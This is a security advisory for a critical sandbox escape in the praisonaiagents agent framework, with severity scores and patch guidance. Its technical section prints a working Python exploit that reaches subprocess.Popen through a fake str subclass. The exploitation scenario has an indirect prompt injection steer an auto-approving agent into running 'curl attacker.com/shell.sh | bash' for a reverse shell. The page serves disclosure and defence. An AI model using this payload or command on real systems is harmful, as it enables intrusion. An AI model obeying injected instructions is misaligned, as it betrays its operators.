CVE-2026-34938 — CRITICAL (CVSS 10.0)

CISO Take

Patch praisonaiagents to 1.5.90 immediately — this is a CVSS 10 sandbox escape that delivers unauthenticated OS command execution with no user interaction required. Any deployment using execute_code() is fully compromised, and the default PRAISONAI_AUTO_APPROVE=true in bot/autonomy modes means indirect prompt injection silently triggers RCE without human confirmation. Until patched, disable or sandbox any agent pipeline that invokes execute_code().

What is the risk?

Maximum exploitability: CVSS 10 with network vector, zero privileges, no user interaction, and scope change (C:H/I:H/A:H). The public PoC lowers exploitation bar to script-kiddie level post-disclosure. PraisonAI is a widely-used multi-agent orchestration framework in enterprise AI pipelines; exposure is broad. Auto-approval defaults dramatically amplify blast radius — a single indirect prompt injection in a document, email, or web result processed by the agent is sufficient to achieve code execution with no human in the loop.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
praisonaiagents	pip	<= 1.5.89	`1.5.90`
11 dependents 86% patched ~0d to patch Full package profile →

Do you use praisonaiagents? You're affected.

Severity & Risk

CVSS 3.1

10.0 / 10

EPSS

0.1%

chance of exploitation in 30 days

Higher than 20% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Moderate

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI None

S Changed

C High

I High

A High

What should I do?

6 steps

PATCH NOW

Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents).
DISABLE AUTO-APPROVE: Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments.
ISOLATE

Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem.
LEAST PRIVILEGE

Ensure the process user running the agent has minimal OS permissions.
DETECT

Log and alert on any invocation of execute_code() — look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads.
AUDIT

Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable Yes

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Prompt Injection Supply Chain Agent Framework Plugin AML.T0010.001 - AI Software AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0051.001 - Indirect AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell AML.T0105 - Escape to Host

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.1.4 - Risk assessment for AI system A.6.2.6 - AI system security

NIST AI RMF

MANAGE-2.2 - Mechanisms exist to sustain deployment of AI with appropriate oversight MAP-5.1 - Likelihood and magnitude of each AI risk driver is examined

OWASP LLM Top 10

LLM02 - Insecure Output Handling LLM07 - Insecure Plugin Design LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-34938?

Patch praisonaiagents to 1.5.90 immediately — this is a CVSS 10 sandbox escape that delivers unauthenticated OS command execution with no user interaction required. Any deployment using execute_code() is fully compromised, and the default PRAISONAI_AUTO_APPROVE=true in bot/autonomy modes means indirect prompt injection silently triggers RCE without human confirmation. Until patched, disable or sandbox any agent pipeline that invokes execute_code().

Is CVE-2026-34938 actively exploited?

No confirmed active exploitation of CVE-2026-34938 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-34938?

1. PATCH NOW: Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents). 2. DISABLE AUTO-APPROVE: Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments. 3. ISOLATE: Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem. 4. LEAST PRIVILEGE: Ensure the process user running the agent has minimal OS permissions. 5. DETECT: Log and alert on any invocation of execute_code() — look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads. 6. AUDIT: Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.

What systems are affected by CVE-2026-34938?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, agentic pipelines with code execution tools, RAG pipelines with autonomous agents, multi-agent orchestration systems, AI-powered automation bots.

What is the CVSS score for CVE-2026-34938?

CVE-2026-34938 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 0.07%.

Technical Details

NVD Description

### Summary `execute_code()` in `praisonai-agents` runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a `str` subclass with an overridden `startswith()` method to the `_safe_getattr` wrapper, achieving arbitrary OS command execution on the host. ### Details `python_tools.py:20` (source) -> `python_tools.py:22` (guard bypass) -> `python_tools.py:161` (sink) ```python # source -- _safe_getattr accepts any str subclass def _safe_getattr(obj, name, *default): if isinstance(name, str) and name.startswith('_'): # isinstance passes for subclasses raise AttributeError(...) # hop -- type() is whitelisted in safe_builtins, creates str subclass without class keyword FakeStr = type('FakeStr', (str,), {'startswith': lambda self, *a: False}) # sink -- Popen reached via __subclasses__ walk r = Popen(['id'], stdout=PIPE, stderr=PIPE) ``` ### PoC ```python from praisonaiagents.tools.python_tools import execute_code payload = """ t = type FakeStr = t('FakeStr', (str,), {'startswith': lambda self, *a: False}) mro_attr = FakeStr(''.join(['_','_','m','r','o','_','_'])) subs_attr = FakeStr(''.join(['_','_','s','u','b','c','l','a','s','s','e','s','_','_'])) mod_attr = FakeStr(''.join(['_','_','m','o','d','u','l','e','_','_'])) name_attr = FakeStr(''.join(['_','_','n','a','m','e','_','_'])) PIPE = -1 obj_class = getattr(type(()), mro_attr)[1] for cls in getattr(obj_class, subs_attr)(): try: m = getattr(cls, mod_attr, '') n = getattr(cls, name_attr, '') if m == 'subprocess' and n == 'Popen': r = cls(['id'], stdout=PIPE, stderr=PIPE) out, err = r.communicate() print('RCE:', out.decode()) break except Exception as e: print('ERR:', e) """ result = execute_code(code=payload) print(result) # expected output: RCE: uid=1000(narey) gid=1000(narey) groups=1000(narey)... ``` ### Impact Any user or agent pipeline running `execute_code()` is exposed to full OS command execution as the process user. Deployments using `bot.py`, `autonomy_mode.py`, or `bots_cli.py` set `PRAISONAI_AUTO_APPROVE=true` by default, meaning no human confirmation is required and the tool fires silently when triggered via indirect prompt injection.

Exploitation Scenario

An attacker embeds a malicious prompt in a publicly accessible document or web page that an autonomous PraisonAI agent crawls as part of its workflow (indirect prompt injection). The injected prompt instructs the agent to call execute_code() with the PoC payload. Because PRAISONAI_AUTO_APPROVE=true is default in autonomy_mode.py, the agent executes the payload silently — no human confirmation dialog appears. The payload walks Python's __subclasses__ chain to reach subprocess.Popen, executes 'curl attacker.com/shell.sh | bash', and establishes a reverse shell. From there, the attacker pivots to any credentials, APIs, or data sources accessible to the agent process.